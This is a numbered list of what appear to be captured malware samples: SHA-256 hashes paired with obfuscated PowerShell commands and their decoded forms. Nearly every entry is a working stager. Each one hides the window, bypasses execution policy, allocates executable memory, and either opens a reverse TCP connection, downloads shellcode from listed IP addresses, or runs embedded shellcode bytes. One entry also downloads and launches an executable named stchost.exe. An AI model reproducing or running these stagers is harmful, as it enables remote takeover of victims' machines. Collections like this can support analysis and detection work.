nVPbTttAEH33V4wsS9iKbTkXKA1C4lKlRWpTRFD7EOXB2Qxky3rX2h0nMTT/3jE4bUG0qvp07N2Zc85cNhBwDCe+N32n1EVRGkuhf4dWo+r30oVSfjSDsporKcBRTgy4Ib6HC02XZOGLtFTl6lQpI8L2bB1DJTXBpsW6xfvo6L91zi3mhNdLhsVOp2p5VzH8Um6/ftNuTxp1/8QjWz8Ejose4zr5PP+GgmBSO8IiHSOlEyPukFyLEE5fuTtdLCw6N8oLqerZcMgCaDlgbexdDK9lPOF1XSKHT4iLKF4PvLSGjDCqDb0WZeQFLj03WrPRcK/7tpd2Dw7Tbtp7sxfDYNCP4DuYihJdKXUEQcmVTU+tzRtjT0270NxRLTD05zWhz1kRB244kJmvUKBcYRiUL4ju+T7zgvof+KZnktjhCi33oXFtuCP9HnPGWdTZb9TqaTZrCDdnI2+9lAohZIVE0d+TI3honHSeW63j4L6zH3fjP7d6pPJbx2xjozGCrXdjLCvK4y57kayLMGi+Oh1WYHOBbNzt6F44eo90xoW6cMoLNWMjH3K9UBhxVtKdbb2AOJd3ImmGBkmBxRztO7yRWpI0GgIByTgvEPyvUvd7PiSa/1yZC4THk1GlRRPpIClz52hpq2ZAxwENh8/eVxYHdfoR9S0t42zTz7KMYZBF3s75VaVJFpg+bqQpJ2hXUqBLP+XWLXPVjNCUddNByHhuTy9jFgabdNf2KIrhpwjvHu2m3j49VoyDTdxA9nxjJpRbSiYKsYRkgsLoBRweDLJsK3ISy4ftDw== \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" --> $c = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);"@try{$s = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)$s.Connect('192.168.1.27', 443) | out-null; $p = [Array]::CreateInstance("byte", 4); $x = $s.Receive($p) | out-null; $z = 0$y = [Array]::CreateInstance("byte", [BitConverter]::ToInt32($p,0)+5); $y[0] = 0xBFwhile ($z -lt [BitConverter]::ToInt32($p,0)) { $z += $s.Receive($y,$z+5,1,[System.Net.Sockets.SocketFlags]::None) }for ($i=1; $i -le 4; $i++) {$y[$i] = [System.BitConverter]::GetBytes([int]$s.Handle)[$i-1]}$t = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru; $x=$t::VirtualAlloc(0,$y.Length,0x3000,0x40)[System.Runtime.InteropServices.Marshal]::Copy($y, 0, [IntPtr]($x.ToInt32()), $y.Length)$t::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}
  508. 8d00faf38de584941a9325915d9fe6b8aeeade5e13b2c2ce57ae961548c4fe37
  509. powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVRtb9pIEP7OrxhZe5KtYMe8NCVYkZqSps1dSdNAk94hdFrsAW9Z7zrrdYBQ/nvHxEfSr/fF6xnPzvPMzDNmD3AG75zG5ELKqyzXxrrOEo1C2WkHiZSON4W8nEkRQ2G5pQPXlr7DlbI31sCdMLbk8lxKHbu1T+bnSWKwKJpQCmUhWY3EE9bG/DmWUmk13uQv7hujLcbWi/43l4FBbnGc0pG8cHm2z601YlZafEXK8nj5zOwQTD5jD+wP7htueIaEdbi8x6ISLiVfvI58RrtKqAznXcOazZYl1GHn/P3g4sPlx09Xf/71eXj95ebr7Wj87e7++9//8Fmc4HyRih9LmSmdP5jClo+r9eYpbLU73Tcnb3unTjDWg5Sbc2P4xvUa81LFFTrELnv0tmDQltQH150Qu8l0Cuzx9xvwE4bIi9Kg/2X2g9oM/qjMvIAe8AeE61YYgo8PcNr2di/ZLWzZvGLvRK0g6PycayouTn29T0Hfjs6AJRN3gdY3XCU6Az/ja5FRVpYEn1EtbOpNd1HNj82jV9kRtpAbHVOrYTvhFdEpWxMcPY6A/buLAFVCFNbEviA11LiwdRWu/jNu97heoEgLrrfbvQJYbIEYg8vEWRgxAb60cNKlt6Mjb8tSQrIRW1aACSFgBFAXSFckCOK7pLiiCkgrRjICMQeXel54Hhy6ThEEWxvO6eP3bw6VOblGG4zQPIoYbzSNZcgVX6CZ9vuVF80AjRVzQZuAd1yKZC+nAZdyRrIkzC2zpsRdxDIyrqngenCjTWExC6r09zgbSIHKRg2WBZ9IeGiKgOTrOmWBxic8ZZ0mOEP9JKTkx90gJP46ywlsJqni4ejqA5wErQjuBfVxVcD12HO8iCkCXUQweb+xuBdUXrUhCy70SknNkwtuueuk1uZF//i41WsFrXYYtN6+CVq9Xr/X7XaOmXLAazBNF4mSXy07yQOzGZoLnAsl9kNiD+Bf03KBQww6bQd8RVaR8xhh77msx1mAn/OisKkpG2x9xnS//9vPJ2yyvJZcM1x3wjCkoxt60aTu2G2prMgwoF1Fo/N6NkUw5KZIuaTBDHS+cVnehLAJk+eVnrpsTatERqftel4TDiBVaXTl9T+HEJts3ayOsFo5XVpflZJ0s/+v+COJmNPmYaxJ2L2TbhjuaP5xut39Ag== \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" --> $q = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);"@try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum % 0x100 -eq 92)}function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$m = New-Object System.Net.WebClient;$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");$n = g; [Byte[]] $p = $m.DownloadData("https://181.120.175.188:8443/$n" )$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}
  510. d7e0c237a4c8c777e6a6125d7743a26995dcc634d8be97cfc711d3c63893d9ad
  511. powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVRtb9tGDP7uX0EIN0BCLEV+aZZYCFDXadZstZvFadLNMIazRFvXnO6U08mR4/q/j3I0J/26LzqR4vF5SD4Ue4RzeO+0ZhdSXmW5NtZ1HtAolL1ukEjpeHPIy4UUMRSWWzqwsvQdrpS9tgbuhLEll0Mpdew2PpkPk8RgUbShFMpC8jQVz9gYy5dYSqXV7SZ/dV8bbTG2XvS/uYwMcou3KR3JK5cXe2itEYvS4htSlscPL8wOweQz9sD+4L7mhmdIWIfLeywq4VLy1dvIF7SrhMpw3res2WxZQh12hh9GFx8vf/t09fsfn8eTL9d/3kxvv97df/vrb76IE1yuUvH9QWZK54+msOX6qdo8h51ur//u5NfTMye41aOUm6ExfON6rWWp4hodYpetvS0YtCX1wXVnxG42nwNb/3wDfsAYeVEa9L8svlObwZ+WmRfQA36BsOqEIfj4CGddb/ea3cKWLWv2TtQJgt6Ppabi4tTX+xT07egcWDJzV2h9w1WiM/AzXomMsrIk+IxqZVNvvosafmwZvcmOsIXc6JhaDdsZr4nOWUVw9DgC9s8uAlQJUaiIfUFqaHBh6yp8+s+42eN6gSItuN5u9wZgtQViDC4T52HEBPjSwkmf3o6OvC1LCclG7KEGTAgBI4CmQLoiQRDfB4or6oC0ZiQjEEtwqeeF58Gh6xRBsI3hnK2/fXWozNkEbTBFsxYxXmsay5grvkIzHwxqL5oRGiuWgjYB77gUyV5OIy7lgmRJmFtmTYm7iGVkTKjgZnDTTWExC+r097gYSYHKRi2WBZ9IeGiKgOTrOmWBxic8ZZ02OGP9LKTkx/0gJP46ywlsIani8fTqI5wEnQjuBfXxqYDJred4EVMEuopg9mFjcS+ovG5DFlzoJyU1Ty645a6TWpsXg+Pjzlk36JycBmHwbnDa7/eOmXLAazFNl4iOXy86SQOzBZoLXAol9gNij+BPaLHAIfRe1wFfkVXkPEbYey6bURbg57wobGrKFqvOmR4MfvrxhG2WN3Jrh1UvDEM6+qEXzZpu3ZTKigwD2lM0Om/mUgRjboqUSxrKSOcbl+VtCNswe1nnucsqWiMyel3X89pwAKlLoytv/zeE2GZVuz7Cet10aX1VStLM/p/iTyViTluHsSZRn570w3BHs4/T7e5f \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" --> $q = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);"@try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum % 0x100 -eq 92)}function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$m = New-Object System.Net.WebClient;$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");$n = g; [Byte[]] $p = $m.DownloadData("https://192.168.0.5:8443/$n" )$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}
  512. 253a94d84c9a398a0ac69f030037502efd6b13c6bdda785a4e9be73ee76eb0d6
  513. powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVRtc9o4EP7Or9jx6GbsCVbMS9OAJzOl0Fy5FpoLtOkdw9wIW2AXWXJkGUwo//3W4CP0632xvNLuPs+unhV5hjt4Z9VmAyGGSaq0sa0115KLVpOGQljOHNJ8IeIAMsMMLrwweA5DaR6Mhm+xNjkTPSFUYFd7Iu2FoeZZVoc8lgbC7SR+4ZWxPPliKiWnu/R1+0ErwwPj+P+bS19zZvg0wiV85XKye8boeJEbfkHKsGB9YnZ2xj1tzuzP2w9Ms4Qj1jn4iIUl3Au2uvQ8oQ1DLMN6VzN6tychdtjqve8PPtz//nH4x6fPo/GXhz8fJ9Ov356+//U3WwQhX66i+MdaJFKlzzoz+WZb7F68RrPVfnPz9rZj0anqR0z3tGY726ktcxmU6BDYZOPsQXOTYx9se4bsZvM5kM2vEfATRpxluebul8UPbDO4kzxxKH7gN/CKhueBy5+h03QOr9kN7MmyZG/5DUpbP5cKiwsiVx1T4NnVHZBwZq+4cTWToUrATVgRJ5iVhPQzlysTOfODX/EjS/8iO4c9pFoF2GrYz1hJdE4KhMPPFZB/Dj5wGSKFAtlnqIYKF/a25Nv/jMcjrkMlasF2DocLgNUekDHYJL7zfBKDKwzctPHv6srZkwiRjE/WJWCICNwHqArEEAEx8l2jX1Y6RCUj4UO8BBt7njkOnLuOHghbGVZn8/2rhWWSBOPGyLPq92SXGZ7QMTf0iS/6IuYS0RP6EeXCdUZRdLaVZ1y7bIVHVh2skXqJhWDXbeohqkpSVNxCIM/RZPgBbmjDh6cYq99mMJ46llMjEjFXPsze7ww/yiAtySd0oLZSKBYOmGG2FRmTdq+vG60OfdOhjfYtbdx63Xa7dU2kBZhGYRTyccv5xBvlyYLrAV/GMj72lTyDO8Z5AAvhW00LXIlWlrKAw3HnvrqBDNyUZZmJdF4jxR1R3e4v74VXJ2mlkrpXtDzPw6XtOf6s6tZjLk2ccIrjxbVKJ1xvYtQLHTGdRUzMu92+Snc2Sevg1WF2msK5TQpUPxqtpu04dTiDlKVhyOUzgYh1UtTLxSunROXGlbnAqz4+Be5EcJ7isPBAoRZvb9qed8DHK4j2h38B \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" --> $q = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);"@try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum % 0x100 -eq 92)}function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}$m = New-Object System.Net.WebClient;$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)")$n = g; [Byte[]] $p = $m.DownloadData("http://139.59.148.180:443/$n" )$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}
  514. 31c14f8ce7b2f0e340f0ed4feb4de893770c67829e6aa7ce60e3391176a281f8
  515. powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVRtc9pGEP7Or9jRXGekMZJlIK6NxjMhOG7cBkKNY6dlmM4hLeji0518OvFiwn/vClTsfO0XnXa1t8+zu8+KPcMVvHcak2spb7NcG+s6T2gUynYrSKR0vCnk5UyKGArLLR24tvQdbpUdWQMPwtiSy56UOnZrn8x7SWKwKJpQCmUhWY3FC9bG/BBLqbS63+Sv7pHRFmPrRf+bS98gt3if0pG8cjnYPWuNmJUW35CyPH46MDsGk8/YI/uje8QNz5Cwjpf3WFTCjeSLt5EHtNuEynDeN6zZbFlCHXZ6H/rXH29++3T7+x+fB8Mvoz/vxvdfHx6//fU3n8UJzhep+P4kM6XzZ1PYcrlab17Cs1a78+7814tLJ7jX/ZSbnjF843qNeaniCh1ily29LRi0JfXBdSfEbjKdAlv+fAN+wAB5URr0v8y+U5vBH5eZF9ADfoFwfRaG4OMzXLa83Wt2C1s2r9g70VkQtH/MNRUXp77ep6BvJ1fAkom7QOsbrhKdgZ/xtcgoK0uCz6gWNvWmu6jmx+bRm+wIW8iNjqnVsJ3wiuiUrQmOHifA/tlFgCohCmtiX5AaalzYugpX/xl3e1wvUKQF19vt3gAstkCMwWXiKoyYAF9aOO/Q28mJt2UpIdmIPVWACSFgBFAXSFckCOL7RHFFFZBWjGQEYg4u9bzwPDh2nSIItjacy+W3rw6VORmiDcZoliLGkaaxDLjiCzTTbrfyoumjsWIuaBPwgUuR7OXU51LOSJaEuWXWlLiLWEbGkAquBzfeFBazoEr/iLO+FKhs1GBZ8ImEh6YISL6uUxZofMJT1mmCM9AvQkp+2glC4q+znMBmkioejG8/wnlwFsGjoD6uChjee44XMUWgiwgmHzYW94LKqzZkwbVeKal5cs0td53U2rzonp52wuAiDM7ehcFlq9vptE+ZcsBrME2XiI5fLTpJA7MZmmucCyX2A2LP4A9pscAh9HbLAV+RVeQ8Rth7bupRFuDnvChsasoGW18x3e3+9OMJmyyv5dYM1+0wDOnohF40qbt1VyorMgxoT9HovJ5LEQy4KVIuaSh9nW9cljchbMLksM5Tl61pjchot1zPa8IRpCqNrrz93xBik62b1RFW66ZL66tSkmb2/xR/LBFz2jqMNYn64rwThjuafZxud/8C \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" --> $q = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);"@try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum % 0x100 -eq 92)}function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$m = New-Object System.Net.WebClient;$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");$n = g; [Byte[]] $p = $m.DownloadData("https://40.80.150.92:443/$n" )$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}
  516. 30c153318f15c1c35b668aae070f3c289466a1834488a525873308dfbacdf592
  517. abfcfacc1627c23fd08e0520f825b7342ba8f4dbe1aea9c02b771577ffa01e21
  518. powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nZZbayNHEIXf/SsaMQ8SlszcL2sMu8kSWAghYJM8GD/09LRikbEkpNFG3iT/PVPfqNrZ5CXkpaev1VXnnKqeyJk783529fix7z+97HeHYT771R+2vs/Sm67vZ4snsz+1/caZ42CH8ePPw7huPm2HH4eD+WlzGE62/9D3Oze/zP22NKfNdjDny/f18v2yuP3f93x78HbwD8/jp9N7The7n5fm7eZL7293X2b+efvL8bM7DP/l7hf/cvTD/N+WQ1Sz91fRbgTyQ9etHl733qzGM60/fPTrzXYzbHZbEzmz+sG+eDP7ebPN0plZbcfRcW+dN8x8d9o62Xk0q709Hofnw+kqOt9Fu3fvvgI5XsbnJI7lk02fPF7cmsdvXgf/+PQUHYXR+NzZcaXzY9NKz9Vj0xTSyFyyltVmbKp8bFJp1tIUnQxbOSGrbSJb5GwmvUIMJNXY1NnYeNm8dmMTy7CRYV3KCZnzcq+XY7k0cSpnMSCWGxmWHFurFZtpsxYPKtyVYSJNjc+ykIhDHUO50knPyoLt1HEPTGI0kYXU6T6czGQ1lrkcNKTJW/W0jRWhWiBpcgWikHvXjQLhM8UFT12rnmYMpdeJqUaOxcxJU8hc1an3XsxXiW7GciuXF8xlgcFWw596oFYGJGPlrXZKqJW5UuyVMCNWaunlECD7OjnrZKEUDCqQlHvTVDfDWyvNWhY8sKOIKvArQ2sVdifHykbtVaXKopQmy5Vuh39vsYGk9BrZl8tqlyu1cJTghkBSYtmqlUZ6mRxLpbGVCikV1+pGRROzJVOEcnEjazX8NFHX6PlAfFkrWyDZIflAPNSWCBh+MwUW7YIzwozFq6zWe5vAvkenEgJiLZziQh5Z3CiUc2BCdcTbZoruJP6QLqkEnXoVDWoCDeaSkGAFeq6UKF8rxBQPL/ta2ZKLG0kZ7IGBbCGZ4AMaiQif16HcEEwhkGR4JfsoGUQE02sE5zVUNJlXIZhcPcUA/HrZbHGy0dsKOdY61YblhCzkpbqbypXoFEKtxOsSlQUFKsarRFWHp2DAEITeLm8alQXYV6FEOiSfhABlc11o+Osu3IFESV1KAT4H+UwQU24qpZH0azu9gxqB/ihp2LOpmichylDCMToFjf4EpobSJ3dY0gqYYIESiWJJsEztUVqoPj5VXFoakknmbKm6ot5TNwCRIsjbQ9AQCm+kaYzaM91H0S+C9CrqC3SjU4loeooqdQOIu0qPUQ7JGdAFIW4DUwoUErUho6jABE0ZdhJMDPuhaCGfKSVBiABLHUIPQVNAMyIv1V2kTB2CBbyiKFA3anGcBGuCEnkcWvblaoqyPlmWszykSawRQRSWCYbU4AQFBaFPyclcp3wQEcJkLu4UErRLaqRhDrp9oXopyHMKtwCGJinmPARFyHMeOagla2uYibXnQzKRppQMREORph5ghScBTU4/Ca1iOv21WEUDhya6O2UGiU76Q6cUVa8XUQqAHVP8H0wSDZJHYZP0EiUP4l2onXGtWKFJXtOprEsIZYiXZ4dkR2Y8WRTQzOmV5ELqbq/Wu4OZR5u7+DbamFXvx8HR3Xzvt78Mz6tkMc5eXy/M7/LDePljfZx+WZ/m0fnmYTcOsnS+uI42i6UZjz5Gm6elSRbmD7M7Davtqe9v/7yKvvDL+dX/9ujGMjov5SO/mveDPQyr+977vVnde7fbdkb+SOP4Lw== \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();" --> $c = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);"@$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = 0xda,0xde,0xba,0xc8,0x95,0x9e,0x1f,0xd9,0x74,0x24,0xf4,0x5d,0x2b,0xc9,0xb1,0x78,0x31,0x55,0x17,0x83,0xed,0xfc,0x03,0x9d,0x86,0x7c,0xea,0xe1,0x41,0x02,0x15,0x19,0x92,0x63,0x9f,0xfc,0xa3,0xa3,0xfb,0x75,0x93,0x13,0x8f,0xdb,0x18,0xdf,0xdd,0xcf,0xab,0xad,0xc9,0xe0,0x1c,0x1b,0x2c,0xcf,0x9d,0x30,0x0c,0x4e,0x1e,0x4b,0x41,0xb0,0x1f,0x84,0x94,0xb1,0x58,0xf9,0x55,0xe3,0x31,0x75,0xcb,0x13,0x35,0xc3,0xd0,0x98,0x05,0xc5,0x50,0x7d,0xdd,0xe4,0x71,0xd0,0x55,0xbf,0x51,0xd3,0xba,0xcb,0xdb,0xcb,0xdf,0xf6,0x92,0x60,0x2b,0x8c,0x24,0xa0,0x65,0x6d,0x8a,0x8d,0x49,0x9c,0xd2,0xca,0x6e,0x7f,0xa1,0x22,0x8d,0x02,0xb2,0xf1,0xef,0xd8,0x37,0xe1,0x48,0xaa,0xe0,0xcd,0x69,0x7f,0x76,0x86,0x66,0x34,0xfc,0xc0,0x6a,0xcb,0xd1,0x7b,0x96,0x40,0xd4,0xab,0x1e,0x12,0xf3,0x6f,0x7a,0xc0,0x9a,0x36,0x26,0xa7,0xa3,0x28,0x89,0x18,0x06,0x23,0x24,0x4c,0x3b,0x6e,0x21,0xfc,0x21,0xe4,0xb1,0x68,0xdd,0x6d,0xdc,0x01,0x75,0x05,0x6c,0xa5,0x53,0xd2,0x93,0x9c,0xad,0x07,0x38,0x4c,0x9d,0xe4,0xec,0x1a,0x1b,0x5c,0x6a,0x7c,0xa4,0xb5,0xdf,0xd1,0x31,0x36,0xb3,0x86,0xad,0xc3,0x13,0x29,0x2e,0xdb,0x51,0x28,0x2e,0x1b,0x75,0x59,0x57,0x76,0xe8,0xf3,0xde,0xeb,0xb9,0x44,0x16,0xdb,0x5c,0x0e,0x30,0x6f,0xcb,0xe4,0xa4,0xf5,0x9e,0x6a,0x52,0x39,0x2b,0x03,0xdf,0x40,0xf2,0x8e,0xb5,0xca,0x47,0x13,0x24,0x59,0x39,0xa7,0xee,0xae,0xe9,0xf5,0x5a,0xbc,0x7a,0xa9,0x35,0x46,0x0e,0x2f,0xe0,0xdd,0xa8,0xc1,0x23,0x15,0x0f,0x41,0x1e,0x03,0xb9,0x1e,0xe8,0xee,0xae,0x99,0x6d,0xc3,0x75,0x17,0xc6,0x61,0x40,0xfe,0x85,0x2b,0xfd,0x41,0x18,0x8b,0x84,0x79,0x32,0x93,0x0e,0x35,0xe7,0x51,0xd8,0xbd,0xc6,0xd3,0x6c,0x0c,0x18,0xa2,0x41,0x26,0x68,0x31,0x93,0xa8,0xcd,0xea,0x9b,0x45,0xaf,0x7e,0x25,0xcc,0x48,0x4a,0x33,0x26,0xa0,0xf6,0xe2,0x1e,0xbe,0xbb,0x62,0xa6,0x57,0x19,0xef,0xb9,0xc5,0xd9,0x8b,0x39,0x5a,0x89,0x04,0xb3,0xc5,0x8f,0x54,0x16,0x70,0xc9,0xf8,0xf1,0x83,0xe7,0x1e,0x85,0xd7,0x54,0x8c,0xd1,0x84,0x0c,0x5a,0x35,0x7f,0x9e,0xa1,0x36,0x55,0x48,0xbf,0xc2,0x09,0x1c,0xc0,0xe0,0xb5,0xdc,0x49,0xe6,0xdc,0xd8,0x19,0x8d,0x3f,0xb6,0xf1,0x24,0x06,0xa8,0x84,0x38,0x53,0x87,0xdb,0x95,0x0f,0x71,0xb4,0x34,0xb6,0x65,0x3f,0xb8,0x63,0x10,0x7f,0x33,0x84,0x55,0xf5,0x65,0x7c,0x23,0xf5,0x95,0x7d,0xd9,0xb5,0xfd,0x7d,0x0d,0x36,0xfe,0x15,0x2d,0x36,0xbe,0xe5,0x7e,0x5e,0x66,0x42,0xd3,0x7b,0x69,0x5f,0x40,0xd0,0xc5,0xe9,0x81,0x80,0x81,0xe9,0x6d,0x2f,0x52,0xb9,0x3b,0x47,0x40,0xab,0x4a,0x75,0x9b,0x06,0xc9,0xba,0x10,0x66,0x5a,0x3d,0xd8,0xbb,0xd9,0x82,0xaf,0xde,0xb9,0xc1,0x0f,0xc9,0x4e,0x39,0x50,0xf6,0x85,0xf1,0x81,0x38,0xdc,0xc8,0xf3,0x08,0x2d,0x1e,0x22,0x5c,0x67,0x60,0x81,0x6e,0x32,0xc2,0xa3,0xe4,0x3c,0x50,0xb3,0x2c;for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000
  519. ec9dd273f915db86de32394827f3f74a3cc6709cee006887ed2fb3ecf9edf753
  520. f1ff32316ecce6a59d391a10b391a06befd8b4eace52567a7770f2c41b939b73
  521. POWERSHELL.EXE powershell -window hidden -enc UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADQALgAxADAAMgAuADUAMgAuADEAMwAvAH4AeQBhAGgAbwBvAC8AcwB0AGMAaABvAHMAdAAuAGUAeABlACcALAAdICQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAcwB0AGMAaABvAHMAdAAuAGUAeABlAB0gKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoAB0gJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABzAHQAYwBoAG8AcwB0AC4AZQB4AGUAHSApAA== --> PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://94.102.52.13/~yahoo/stchost.exe', $env:APPDATA\stchost.exe );Start-Process ( $env:APPDATA\stchost.exe )
